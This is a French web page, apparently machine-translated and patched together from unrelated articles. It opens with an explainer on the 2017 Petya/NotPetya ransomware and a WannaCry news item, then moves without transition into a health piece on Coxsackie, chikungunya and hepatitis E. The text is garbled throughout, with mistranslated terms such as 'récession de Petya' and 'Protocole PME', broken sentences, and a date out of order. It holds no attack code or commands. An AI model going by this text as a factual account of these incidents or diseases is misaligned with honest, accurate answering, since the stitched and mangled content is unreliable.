Comment cela marche-t-il?

Une attaque virale de type Ransomware le 27 juin 2017 a touché de nombreux pays, dont la Russie. Il s'agit d'un type de malware qui bloque l'accès à un ordinateur ou à ses données et demande de l'argent pour y restaurer l'accès.

Lorsque l'ordinateur est infecté, Ransomware crypte documents importants et fichiers, puis demande une rançon, généralement en bitcoins, pour obtenir clé numérique requis pour déverrouiller les fichiers. Si les victimes n'ont pas de récent copie de sauvegarde fichiers, ils doivent soit payer une rançon, soit perdre toutes leurs données.

Comment fonctionne la récession de Petya ?

L'appareil infecté verrouille les ordinateurs du réseau et exige 300 $, payables en Bitcoin. Le malware se propage rapidement après l'infection en utilisant la vulnérabilité EternalBlue dans Windows (Microsoft a publié un correctif, mais tout le monde ne l'a pas installé) ou deux outils d'administration du système d'exploitation. Le virus essaie un paramètre, et s’il ne fonctionne pas, il essaie le suivant. En même temps, il a meilleur mécanisme pour la distribution que WannaCry, comme l'ont noté les experts.

Y a-t-il des protections ?

La plupart des grands éditeurs d'antivirus affirment que leur logiciel a été mis à jour pour détecter et protéger activement contre les infections par le virus Petya. Par exemple, les fabricants de produits Symantec et Kaspersky ont annoncé que leurs logiciels de sécurité pouvaient désormais détecter les logiciels malveillants.

En plus, Mise à jour Windows et maintenir le système d'exploitation état actuel arrête également l'une des principales méthodes d'infection et protège également contre les futures attaques avec différentes charges utiles.

Contre cette attaque de malware particulière, une autre ligne de défense a été découverte : Petya vérifie les fichiers en lecture seule C:\Windows\perfc.dat, et s'il le trouve, il n'exécutera pas le côté cryptage du logiciel. Mais ce « vaccin » n’empêche pas réellement l’infection, et le malware continuera à utiliser son implantation sur votre PC pour tenter de se propager à d’autres personnes sur le même réseau.

Pourquoi s'appelle-t-on « Petya » ?

À proprement parler, le nouveau virus n’est pas exactement ce que les experts appellent « Petya ». Ce malware semble contenir une quantité importante de code qui présente de nombreux chevauchements avec un virus plus ancien qui s'appelait en réalité Petya. Mais quelques heures après les attaques, les chercheurs ont remarqué qu’il ne s’agissait que de similitudes superficielles. Les chercheurs de Kaspersky Lab, après une attaque de virus en Russie, ont refusé d'appeler ce malware par ce nom et ont donc commencé à se propager options similaires noms - Petna, Pneytna, etc. De plus, d'autres chercheurs qui ont eux-mêmes remarqué le malware lui ont donné d'autres noms : le roumain Bitdefender l'a appelé Goldeneye, par exemple.

Comment ça a commencé ?

L'attaque semble avoir été menée à l'aide du mécanisme de mise à jour logicielle intégré à programme de comptabilité, qui, selon la cyber-police ukrainienne, devrait être utilisé par les entreprises travaillant avec le gouvernement ukrainien. Cela explique pourquoi tant d'organisations ukrainiennes ont été touchées, notamment le gouvernement, les banques, les sociétés énergétiques publiques et l'aéroport et le métro de Kiev. Le système de Tchernobyl a également été mis hors ligne, obligeant le personnel à utiliser des compteurs portatifs pour mesurer les niveaux de rayonnement dans la zone d'exclusion de la centrale. La deuxième vague d’infections a été provoquée par une campagne de phishing utilisant des applications malveillantes.

Jusqu’où s’est-il propagé ?

La nouvelle version de "Petit" a provoqué de graves perturbations dans le travail de grandes entreprises en Europe et aux États-Unis, notamment société de publicité WPP, français entreprise de construction Saint-Gobain et les sociétés sidérurgiques et pétrolières russes. Il y a eu notamment une attaque virale massive contre Rosneft et Evraz. Entreprise alimentaire Mondelez, cabinet d'avocats DLA Piper, la société danoise d'expédition et de transport A.P. Moller-Maersk et Heritage Valley Health System, qui gère des hôpitaux et des établissements de soins à Pittsburgh, ont également déclaré que leurs systèmes étaient affectés par le logiciel malveillant.

Contrairement à WannaCry, cette version de Petya tente de se diffuser au sein des réseaux, mais ne se manifeste pas à l'extérieur. Cela pourrait limiter la propagation extrême des logiciels malveillants, ce qui semble avoir ralenti du jour au lendemain la baisse des nouvelles infections.

Publié : 16 mai 2017, 07:46 | Kuksilova Polina Olegovna

Les experts en cybersécurité suggèrent que l'attaque virale enregistrée à la fin de la semaine précédente pourrait s'intensifier lorsque les travailleurs rallumeront leur ordinateur. Au Royaume-Uni, ce sont les cliniques qui ont été les plus durement touchées.

Le ransomware WannaCry (également connu sous le nom de WannaCryptor et WCry) crypte les fichiers des utilisateurs, les rendant inutilisables. Pour lever le blocage, les attaquants ont demandé une rançon en bitcoins, l'équivalent de 300 à 600 dollars. Pour savoir comment échapper au virus ransomware et protéger vos fichiers sur votre ordinateur, consultez les instructions de l'agence de presse YakutiaMedia. Vous pouvez contacter les délinquants directement via le programme. Kaspersky Lab a signalé 45 000 tentatives attaques de pirates dans 74 pays à travers la planète à la fin semaine de travail, le plus grand nombre des tentatives d’infection ont été observées en Fédération de Russie.

Après le ministère de l'Intérieur signalé concernant la prévention réussie de l'attaque, des messages identiques sont apparus d'autres départements gouvernementaux - le ministère des Situations d'urgence, le ministère de la Santé et, en outre, les chemins de fer russes et l'Inspection nationale de la sécurité routière. Autorisé Avast Jakub Kroustek a déclaré sur Twitter qu'environ 36 000 ordinateurs à travers la planète ont été infectés, la plupart d'entre eux se trouvant dans la Fédération de Russie, à Taiwan et en Ukraine. Les ordinateurs de la Fédération de Russie ont été infectés par au moins Megafon, le ministère de l'Intérieur et la commission d'enquête, ainsi que, probablement, les chemins de fer russes.

Ensuite, le programmeur a effectué la procédure d'enregistrement, après quoi le virus a terminé ses attaques. Parmi les cibles des attaques figurent non seulement ordinateurs personnels, cependant, les serveurs de la clinique, chemins de fer, opérateurs mobiles, les banques et les forces de l'ordre.

Les attaques soit influence néfaste sur systèmes d'informations NPK Daedalus lui-même à moment réel n'est pas enregistré, les systèmes fonctionnent normalement, cependant, au minimum, les spécialistes ont pris des mesures pour renforcer les mesures de sécurité et prévenir d'éventuelles menaces. Il s'avère que la principale caractéristique est l'utilisation de l'exploit ETERNALBLUE. Au début ce programme a été développé par la National Security Agency des États-Unis. Selon des informations fiables de Kaspersky Lab, l'attaque se produit en utilisant une vulnérabilité dans Protocole PME, qui vous permet d'exécuter du code de programme à distance.

Renault a suspendu ses propres usines pour tester ses PC. En moins de 24 heures, leurs victimes ont transféré plus de 7 bitcoins, soit environ 12 000 dollars.

Pour se protéger société Microsoft mises à jour versions obsolètes système d'exploitation bien connu. Il est nécessaire d'utiliser un antivirus mis à jour en mode surveillance et, si possible, de vérifier l'absence de menaces sur le système. Mais de nombreux utilisateurs et organisations désactivent les mises à jour sur posséder des ordinateurs. "Le virus verrouille l'écran de l'ordinateur et crypte les fichiers sur le disque dur." En règle générale, les lettres de ransomware sont envoyées sous la forme de relevés des services comptables ou d'amendes impayées de la police de la circulation.

Les fragments ci-dessus sont loin d'être liste complète conséquences Attaques WannaCry, dans de nombreux cas, le préjudice n’a pas encore été évalué. "En raison d'une cyberattaque présumée à l'échelle nationale, nous prenons toutes les précautions pour protéger les systèmes et les serveurs du NHS ici", indique le communiqué.

Aujourd’hui, plusieurs virus terrorisent le monde. Et beaucoup de ceux qui partent en vacances ou en voyage d'affaires commencent à s'inquiéter de ne rien rapporter du voyage. Le plus intéressant, disent les experts, c'est qu'aujourd'hui, les infections typiques des pays du tiers monde ont commencé à se propager dans des pays assez prospères. Que devez-vous savoir sur virus modernes et comment vous en protéger - dans le matériel d'AiF.ru.

Coxsackie turc

Au début de l’été 2017, la nouvelle de la propagation du virus Coxsackie en Turquie a ébranlé la Russie. Il s'agit d'un type d'entérovirus particulièrement dangereux pour les enfants de moins de 10 ans. Cependant, les adultes peuvent également y être sensibles. Cette maladie est souvent appelée « main-pied-bouche ». Ce nom est associé aux méthodes de transmission. Le virus Coxsackie peut être transmis à la fois par des gouttelettes en suspension dans l'air et par des mains sales. C'est pourquoi elle touche le plus souvent les enfants, qui ne respectent pas toujours toutes les exigences d'hygiène. Pour les personnes ne souffrant d’aucune maladie chronique, cette pathologie n’est pas dangereuse. Il suffit de suivre le repos au lit et de prendre les médicaments prescrits pour se remettre sur pied dans les 5 jours. Ceux qui souffrent d’une maladie chronique doivent être prudents et suivre les recommandations du médecin avec un zèle particulier.

Parmi les symptômes qui indiquent Coxsackie : une élévation de la température à des valeurs élevées, des troubles gastro-intestinaux, l'apparition d'une éruption cutanée sur le corps et un mal de gorge.

Il est important de se rappeler que les complications du virus Coxsackie peuvent être assez graves : myocardite, encéphalite - ce n'est pas la liste la plus complète des problèmes qui surviennent dans le contexte d'une telle pathologie. Il n’y a pas de prévention en tant que telle, mais le respect suffira. règles simples hygiène : se laver soigneusement les mains après être sorti, nager dans la piscine et avant tous les repas, utiliser de l'eau en bouteille, bien laver les fruits et légumes avant de les manger.

Fièvre indienne

La fièvre chikungunya est une maladie virale qui provoque haute température et des articulations douloureuses. La maladie tire son nom d’un verbe qui, en langue Kimakonde, signifie « devenir tordu ». Cette association est née du fait que les personnes souffrant de cette maladie se recroquevillent littéralement et se courbent de douleur. Le plus souvent, la fièvre est courante en Inde et dans les pays d'Afrique et d'Asie. Mais cela peut aussi se produire en Europe.

Des épidémies pathologiques se produisent souvent partout dans le monde. Ainsi, la première a eu lieu en 1952 en Tanzanie. Au début des années 2000, la maladie est apparue au Congo et en 2007 elle a gravement touché la population du Gabon. Souvent, la fièvre est une conséquence de l’apparition de la maladie. En 2014, le Chikungunya est apparu en France.

Le virus se transmet de personne à personne par les piqûres de moustiques femelles infectées. Il est transmis par les mêmes espèces d'insectes qui transmettent le virus Zika. Les moustiques se reproduisent à proximité d’étangs artificiels ou de récipients contenant de l’eau de pluie.

La période d'incubation d'une telle maladie est de 4 à 8 jours après l'infection, mais cette période peut parfois être prolongée jusqu'à 12 jours. La fièvre se caractérise par une forte augmentation des chiffres sur le thermomètre jusqu'à valeurs critiques, en parallèle, se développent une inflammation et des douleurs au niveau des articulations : elle est caractérisée comme forte et contraignante. Il peut y avoir des manifestations de douleur migrante. Les symptômes supplémentaires incluent des douleurs musculaires, une photophobie, des maux de tête et des éruptions cutanées. Avec un traitement adéquat, la guérison survient dans les 6 à 10 jours suivant son apparition, mais dans certains cas, des douleurs articulaires peuvent survenir plusieurs mois après la fin de la maladie, voire plusieurs années.

Le traitement est dans la plupart des cas symptomatique et vise à réduire la douleur. Les médecins proposent aux patients des antipyrétiques, des analgésiques et des anti-inflammatoires. Il est également conseillé de boire beaucoup de liquides.

Nouvelle hépatite

L'hépatite E, qui a maintenant été découverte au Royaume-Uni, est également maladie virale. Elle se transmet par voie fécale-orale, c'est-à-dire, tout simplement, par les mains sales, l'eau ou la nourriture. En ce sens, elle ressemble beaucoup à l’hépatite A. La maladie a reçu sa classification en 1983 : jusqu’alors elle était classée « ni A ni B ». L'hépatite E, par rapport au type A, provoque plus souvent des formes aiguës et sévères et affecte non seulement le foie, mais également les reins. Le plus souvent, cette maladie touche les hommes et les représentants de la tranche d'âge de 15 à 45 ans.

La période d'incubation de la maladie est de 40 jours, mais elle peut varier de 15 jours à 2 mois. Côté symptômes, cela ressemble à ceci : Une personne devient faible, son appétit diminue et ses performances diminuent. A également noté température élevée, la douleur à droite dans la zone située sous les côtes, les yeux et la peau commencent à jaunir. Les manifestations surviennent progressivement, les symptômes augmentent.

La pathologie est traitée comme suit. Le patient doit être sous la surveillance de médecins. On lui propose un régime et un traitement spécialisé utilisé dans le traitement d'autres types d'hépatite. De plus, un traitement symptomatique est utilisé pour prévenir les complications rénales.

La prévention de la maladie est la même que celle de Coxsackie : une hygiène personnelle rigoureuse et le refus d'utiliser l'eau du robinet dans les pays où des cas de cette maladie sont signalés.

Faut-il avoir peur ?

Les experts recommandent de ne pas paniquer. Après tout, les infections émergentes ne sont pas toujours mortelles. « La grande majorité des infections connues aujourd’hui (je n’inclus pas ici les surinfections en constante mutation) ont existé secrètement sous une forme ou une autre pendant de nombreux siècles jusqu’à ce qu’elles soient découvertes par les adeptes de la médecine occidentale. Après cela, ils ont commencé à susciter une inquiétude généralisée parmi le public. Aujourd’hui comme par le passé, l’émergence de nouvelles infections a toujours été associée aux actions de personnes entrées en contact avec l’inconnu. Une grande variété de mélanges de deux ou plusieurs populations provenant de continents différents a conduit à la transmission et à la propagation rapide de maladies non indigènes. Par exemple, avant la découverte de l’Amérique par la civilisation européenne, il n’existait pas de paludisme, de variole, de rougeole, de fièvre jaune et de nombreuses autres maladies infectieuses bien connues des Européens du Nouveau Monde », explique médecin spécialiste en santé publique et soins de santé Pavel Stotsko.

Dans le même temps, les questions de migration et divers problèmes la santé existent toujours et sont étroitement liées. Certes, ce lien n’est pas entretenu par les infections, mais par un accès inégal, même dans certains pays développés, aux soins médicaux, à l’éducation, à la protection des droits de l’homme, ainsi qu’à la discrimination et même à l’isolement des migrants et d’autres communautés et groupes vulnérables, l’expert en est sûr. Les inégalités sociales ouvrent les portes à diverses infections qui ne nécessitent pas ascenseurs sociaux pour toucher toutes les couches de la population. Incontrôlées, elles touchent tout le monde : les pauvres et les riches, les locaux et les visiteurs.

Des questions ?

Signaler une faute de frappe

Texte qui sera envoyé à nos rédacteurs :